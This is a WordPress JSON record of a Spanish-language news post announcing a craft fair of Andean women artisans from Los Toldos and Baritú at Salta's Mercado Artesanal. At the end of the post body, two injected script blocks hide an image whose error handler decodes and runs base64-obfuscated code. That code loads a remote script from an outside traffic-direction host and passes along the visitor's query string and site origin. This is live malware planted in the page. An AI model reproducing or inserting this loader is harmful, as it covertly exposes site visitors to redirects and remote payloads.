{"id":3101,"date":"2023-09-12T10:11:44","date_gmt":"2023-09-12T13:11:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3101"},"modified":"2025-08-14T00:08:33","modified_gmt":"2025-08-14T03:08:33","slug":"artesanas-de-los-toldos-y-baritu-llegan-al-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3101","title":{"rendered":"Artesanas de Los Toldos y Barit\u00fa llegan al Mercado Artesanal de Salta"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#880946\"><em>Desde hoy 12 y hasta el 14 de septiembre, ofrecer\u00e1n a salte\u00f1os y turistas una amplia variedad de productos elaborados por mujeres campesinas y de comunidades originarias del departamento de Santa Victoria. Entrada gratuita.<\/em><\/h5>\n\n\n\n<p>Con el apoyo de la Secretar\u00eda de Cultura de la Provincia, la iniciativa se enmarca en el ciclo impulsado por este organismo \u201cLos Municipios llegan al Mercado Artesanal\u201d, con el objetivo de promover y dar a conocer el arte, historia y cultura de cada localidad de Salta.<\/p>\n\n\n\n<p>En esta oportunidad, \u201cLos Toldos llega al Mercado Artesanal\u201d con una propuesta &nbsp;de exposici\u00f3n y venta de artesan\u00edas en lana de oveja y llama, tejidos con tintes naturales y t\u00e9cnicas ancestrales, cester\u00eda vegetal, bordados multicolores, alforjas personalizadas y mucho m\u00e1s.<\/p>\n\n\n\n<p>La muestra estar\u00e1 abierta al p\u00fablico de manera gratuita desde hoy martes 12 al jueves 14 de septiembre de 10 a 20:30 horas en el hall del Mercado Artesanal, Av. San Mart\u00edn 2555, donde promocionar\u00e1n su pueblo y costumbres.<\/p>\n\n\n\n<p>La inauguraci\u00f3n de la muestra se llevar\u00e1 a cabo hoy&nbsp;martes 12 de septiembre a las 11 horas, con la presencia de artesanas y autoridades del Municipio y Provincia. Al finalizar se compartir\u00e1 empanadas con los presentes.<\/p>\n\n\n\n<p>Asimismo, a las 18 horas se realizar\u00e1 un Encuentro entre Agrupaciones Gauchas del Valle de Lerma y Artesanas Tejedoras de Alforjas para compartir saberes y tejer redes. Todas las actividades son abiertas y gratuitas.<\/p>\n\n\n\n<p>Durante los d\u00edas de muestra, las artesanas intercambiar\u00e1n con los visitantes sus saberes y t\u00e9cnicas ancestrales andinas transmitidas de generaci\u00f3n a generaci\u00f3n.<\/p>\n\n\n\n<p>Participan y convocan, grupos de mujeres artesanas, cooperativas y comunidades kollas de Los Toldos; El Arazay; Lipeo; Barit\u00fa; Misi\u00f3n y El Condado.<\/p>\n\n\n\n<p>Organizan Municipalidad de Los Toldos; Instituto Nacional de Agricultura Familiar Campesina e Ind\u00edgena; Parque Nacional Barit\u00fa y Mercado Artesanal de Salta.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/artesanas-de-los-toldos-y-baritu-llegan-al-mercado-artesanal-de-salta-91762\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde hoy 12 y hasta el 14 de septiembre, ofrecer\u00e1n a salte\u00f1os y turistas una amplia variedad de productos elaborados por mujeres campesinas y de comunidades originarias del departamento de Santa Victoria. Entrada gratuita. Con el apoyo de la Secretar\u00eda de Cultura de la Provincia, la iniciativa se enmarca en el ciclo impulsado por este [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3102,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-3101","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3101"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3101"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3101\/revisions"}],"predecessor-version":[{"id":6965,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3101\/revisions\/6965"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3102"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3101"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}